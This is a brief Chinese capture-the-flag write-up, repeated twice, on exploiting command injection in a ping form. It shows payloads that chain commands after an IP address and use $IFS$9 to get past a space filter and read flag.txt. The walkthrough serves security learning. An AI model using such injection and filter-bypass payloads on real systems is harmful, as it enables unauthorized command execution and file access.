题目页面如下图,ping,很容易让人想起来命令执行漏洞
先用ls 测试一下,成功执行
在打算跳到根目录时,=127.0.0.1;ls / 发现没有正常显示测试得出对空格进行过滤
使用$IFS$9替换(当然还有其他方式在此不在赘述)
成功跳转,看到flag.txt,使用127.0.0.1;cd$IFS$9/;cat$IFS$9flag.txt
成功读取到内容
题目页面如下图,ping,很容易让人想起来命令执行漏洞
先用ls 测试一下,成功执行
在打算跳到根目录时,=127.0.0.1;ls / 发现没有正常显示测试得出对空格进行过滤
使用$IFS$9替换(当然还有其他方式在此不在赘述)
成功跳转,看到flag.txt,使用127.0.0.1;cd$IFS$9/;cat$IFS$9flag.txt
成功读取到内容